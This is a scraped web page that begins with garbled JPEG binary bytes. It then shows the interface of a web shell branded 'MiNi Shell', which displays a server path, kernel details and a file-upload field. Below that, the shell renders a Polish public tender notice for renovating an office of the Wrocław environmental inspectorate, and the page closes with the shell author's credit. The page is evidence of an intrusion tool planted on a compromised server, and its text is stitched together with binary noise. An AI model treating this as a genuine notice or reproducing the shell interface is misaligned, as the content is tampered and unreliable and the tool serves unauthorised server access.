JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/0037124301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Robota budowlana - Adaptacja obiektu biurowo – administracyjnego dla potrzeb Wałbrzyskiej Delegatury Wojewódzkiego Inspektoratu Ochrony Środowiska we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Inspektorat Ochrony Środowiska we Wrocławiu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">WIOŚ we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931020269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Józefa Chełmońskiego 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">51-630</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.kozyra@wroclaw.wios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wroclaw.wios.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Robota budowlana - Adaptacja obiektu biurowo – administracyjnego dla potrzeb Wałbrzyskiej Delegatury Wojewódzkiego Inspektoratu Ochrony Środowiska we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16d81254-1014-44bb-a8b6-d3c61a33d783</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00371243</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00094447/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Adaptacja obiektu biurowo-administracyjnego dla potrzeb wałbrzyskiej delegatury Wojewódzkiego Inspektoratu Ochrony Środowiska we Wrocławiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-16d81254-1014-44bb-a8b6-d3c61a33d783 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Złożenie oferty jest możliwe wyłącznie na platformie e<br/>zamówienia zgodnie z instrukcją zamieszczoną na stronie <br/>https://ezamowienia.gov.pl/pl/, adres postępowania: <br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610<br/>16d81254-1014-44bb-a8b6<br/>d3c61a33d783#:~:text=ocds%2D148610%2D16d81254%2D1014<br/> %2D44bb%2Da8b6%2Dd3c61a33d783 <br/>Identyfikator postępowania: ocds-148610-16d81254-1014-44bb<br/>a8b6-d3c61a33d783 <br/>Pozostała korespondencja pomiędzy Wykonawcą a Zamawiającym <br/>będzie prowadzona w formie elektronicznej za pomocą poczty <br/>elektronicznej platformy zakupowej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa <br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu <br/>sporządzania i przekazywania informacji oraz wymagań <br/>technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia <br/>publicznego lub konkursie, udostępnia poniżej informacje na temat <br/>specyfikacji połączenia, formatu przesłanych danych oraz <br/>szyfrowania i oznaczania czasu przekazania i odbioru danych. <br/><br/>Wymagania techniczne i organizacyjne wysyłania i odbierania <br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i <br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane <br/>zostały w Regulaminie platformy e-zamowienia. <br/><br/>W postępowaniu o udzielenie zamówienia ofertę oraz <br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa <br/>się, pod rygorem nieważności, w formie elektronicznej lub w postaci <br/>elektronicznej opatrzonej kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub podpisem osobistym (za <br/>pomocą e-dowodu osobistego z certyfikatem podpisu osobistego). <br/>8.5. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o <br/>udzielenie zamówienia publicznego musi posiadać konto na <br/>Platformie e-zamowienia. Wykonawca posiadający konto na <br/>Platformie e-zamowienia ma dostęp do formularzy: złożenia, <br/>zmiany, wycofania oferty lub wniosku oraz do formularza <br/>komunikacji. <br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem <br/>dedykowanych formularzy do: złożenia, zmiany, wycofania oferty <br/>lub wniosku oraz komunikacji wynosi 250MB. <br/><br/>Za datę przekazania oferty, wniosków, zawiadomień, <br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii <br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się <br/>datę ich przekazania na Platformę e-zamowienia. <br/><br/>Zamawiający przekazuje identyfikator do postępowania: ocds<br/>148610-16d81254-1014-44bb-a8b6-d3c61a33d783 <br/>8.9. <br/>Dane postępowanie można wyszukać również na Liście <br/>wszystkich postępowań klikając wcześniej opcję „Dla <br/>Wykonawców” lub ze strony głównej z zakładki Postępowania na <br/>Platformie e-zamowienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.272.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zawarcie umowy na wykonanie robót <br/>budowlanych w projekcie pn.: „Adaptacja obiektu biurowo – <br/>administracyjnego dla potrzeb Wałbrzyskiej Delegatury <br/>Wojewódzkiego inspektora Ochrony Środowiska we Wrocławiu” w <br/>części i na zasadach określonych w załączniku nr 9 do SWZ – Projekt <br/>umowy wraz z załącznikami, w szczególności w przedmiarze robót, <br/>specyfikacji technicznej wykonania i odbioru robót, projekt <br/>budowlany. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W ramach niniejszego postępowania, Zamawiający wydziela: <br/>1. zamówienie podstawowe wyrażone zakresem: wykonanie <br/>robót budowlanych w zakresie wskazanym w przedmiarze robót <br/>pn.: „Dach, ścianki działowe, ogrodzenie” oraz wyznaczone <br/>terminem: do 31 grudnia 2025 r. <br/>2. zamówione realizowane w ramach prawa opcji wyrażone zakresem: <br/>wykonanie robót budowlanych określonych w przedmiarze robót <br/>jako: <br/>a) „pozostałe” oraz wyrażone terminem: od podpisania umowy do <br/>30 dni przed jej zakończeniem; <br/>b) „zagospodarowanie terenu” oraz wyrażone terminem od 1 <br/>stycznia 2025 r. do 30 dni przed terminem zakończenia umowy. <br/>Opcja jest uprawnieniem Zamawiającego, a brak realizacji prawa <br/>opcji nie może stanowić podstawy do roszczeń ze strony <br/>Wykonawcy. Sposób uruchamiania opcji został opisany w <br/>załączniku nr 9 do SWZ – Projekt umowy z załącznikami. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej: <br/>6.2.4.1. Warunek ten spełniają Wykonawcy, którzy wykonali należycie w <br/>okresie ostatnich 5 lat, przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie, minimum dwie roboty budowlane polegające na <br/>wykonaniu robót ogólnobudowlanych, o wartości minimum <br/>700 000,00 zł brutto każda. Przez robotę budowlaną rozumie <br/>się wykonanie robót w ramach jednego kontraktu. - - - - - <br/>W przypadku Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia (konsorcjum, spółka cywilna), <br/>przynajmniej jeden z Wykonawców musi spełniać warunek <br/>dotyczący posiadanych zdolności zawodowych powyżej <br/>wskazanych, w pełni samodzielnie. <br/>Nie dopuszcza się sumowania mniejszych, cząstkowych robót <br/>objętych odrębnymi umowami Wykonawcy, bądź wspólnie <br/>ubiegających się o udzielenie zamówienia Wykonawców, w celu <br/>wykazania spełnienia danego warunku. <br/>Roboty budowlane należycie wykonane oznacza roboty <br/>wykonane zgodnie z przepisami prawa budowlanego i <br/>prawidłowo ukończone. <br/>Jako robotę budowlaną wykonaną – należy rozumieć wykonane <br/>roboty, dla których wystawiono Protokół odbioru robót lub <br/>Świadectwo Przejęcia lub równoważny dokumenty w przypadku <br/>zamówień, w których nie wystawiono Protokołu odbioru lub <br/>Świadectwa Przejęcia. <br/>Wartości podane w dokumentach potwierdzających spełnienie <br/>warunku w walutach innych niż złoty polski, Wykonawca <br/>przeliczy wg średniego kursu Narodowego Banku Polskiego <br/>(NBP) na dzień opublikowania ogłoszenia o zamówieniu <br/>dotyczącego niniejszego postępowania w BZP lub ostatniego <br/>kursu sprzed dnia opublikowania ogłoszenia o niniejszym <br/>zamówieniu – w przypadku gdyby w tym dniu kurs nie był <br/>podawany. <br/>6.2.4.2. Warunek ten spełniają Wykonawcy, którzy wykażą że <br/>dysponują jedną osobą, która będzie kierowała robotami <br/>budowlanymi, posiadającą ważne uprawnienia do kierowania <br/>robotami budowlanymi w specjalności <br/>ogólnobudowlanej (zgodnie z rozporządzeniem Ministra <br/>Infrastruktury i Rozwoju z dnia 11.09.2014 r. w sprawie <br/>samodzielnych funkcji technicznych w budownictwie Dz. U. <br/>2014, poz. 1278), wpisanym na listę członków właściwej <br/>terytorialnie izby samorządu, która posiada co najmniej 18 <br/>miesięczne doświadczenie. <br/>Wykonawca musi dysponować, przynajmniej jedną osobą, <br/>która posiada uprawnienia do kierowania robotami <br/>instalacyjnymi w branży sanitarnej, co najmniej w <br/>ograniczonym zakresie, oraz jedną osobę, która posiada <br/>uprawnienia do kierowania robotami instalacyjnymi w <br/>branży elektrycznej, co najmniej ograniczonym zakresie . <br/>Jeżeli Wykonawca dysponuje osobą posiadającą uprawnienia, <br/>która ma miejsce zamieszkania poza terytorium <br/>Rzeczypospolitej Polskiej, musi wykazać, że osoba ta <br/>legitymuje się kwalifikacjami odpowiadającymi wymaganym <br/>uprawnieniom w kraju zamieszkania, jeżeli takowe w tym kraju <br/>obowiązują, z uwzględnieniem prawa do wykonywania <br/>określonych zawodów regulowanych lub określonych <br/>działalności, jeżeli te kwalifikacje zostały uznane na zasadach <br/>przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach <br/>uznawania kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394 z późn. <br/>zm.). <br/>Zamawiający dopuszcza połączenie wyżej wskazanych funkcji <br/>pod warunkiem spełnienia przez osobę łączącą te funkcje <br/>wszystkich warunków wymaganych dla poszczególnych funkcji. <br/>Zamawiający dopuszcza, w zakresie posiadanych uprawnień <br/>osób realizujących przedmiot zamówienia, ważne uprawnienia <br/>wydane na podstawie wcześniejszych aktów prawnych lub <br/>innych obowiązujących przepisów wydanych na podstawie <br/>ustawy Prawo budowlane z dnia 07.07.1994 r. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt <br/>5 ustawy Pzp, o braku przynależności do tej samej grupy <br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o <br/>ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. <br/>275), z innym wykonawcą, który złożył odrębną ofertę <br/>albo <br/>oświadczenia o przynależności do tej samej grupy kapitałowej <br/>wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty niezależnie od innego wykonawcy <br/>należącego do tej samej grupy kapitałowej; <br/>Wzór stanowi Załącznik nr 3 do SWZ; <br/>2) oświadczenia Wykonawcy o aktualności informacji <br/>zawartych w oświadczeniu Wykonawcy o niepodleganiu <br/>wykluczeniu i spełnieniu warunków udziału w postępowaniu – <br/>zgodnie z załączonym wzorem stanowiącym Załącznik nr 5 do <br/>SWZ.<br/>3) oświadczenie podmiotu udostepniającego - jeżeli dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz robót budowlanych wykonanych nie wcześniej niż w <br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności <br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, <br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz <br/>których roboty te zostały wykonane, oraz załączeniem <br/>dowodów określających, czy te roboty budowlane zostały <br/>wykonane należycie, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie <br/>uzyskać tych dokumentów – inne odpowiednie dokumenty – <br/>wzór stanowi Załącznik nr 7 do SWZ. <br/>b. wykaz osób, skierowanych przez wykonawcę do realizacji <br/>zamówienia publicznego, w szczególności odpowiedzialnych za <br/>świadczenie usług, kontrolę jakości lub kierowanie robotami <br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/>zawodowych, uprawnień, doświadczenia i wykształcenia <br/>niezbędnych do wykonania zamówienia publicznego, a także <br/>zakresu wykonywanych przez nie czynności oraz informacją o <br/>podstawie do dysponowania tymi osobami -wzór stanowi <br/>załącznik nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> wszelkie zmiany do umowy, ich zakres oraz sposób wprowadzenia tych zmian został zawarty w dokumentach postępowania, tj. w projekcie do umowy - załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">11.1. Ofertę należy złożyć w formie elektronicznej za pośrednictwem platformy zakupowej zamieszczonej pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-16d81254-1014-44bb-a8b6-d3c61a33d783#:~:text=ocds%2D148610%2D16d81254%2D1014%2D44bb%2Da8b6%2Dd3c61a33d783 Identyfikator postępowania: ocds-148610-16d81254-1014-44bb-a8b6-d3c61a33d783</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-26 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com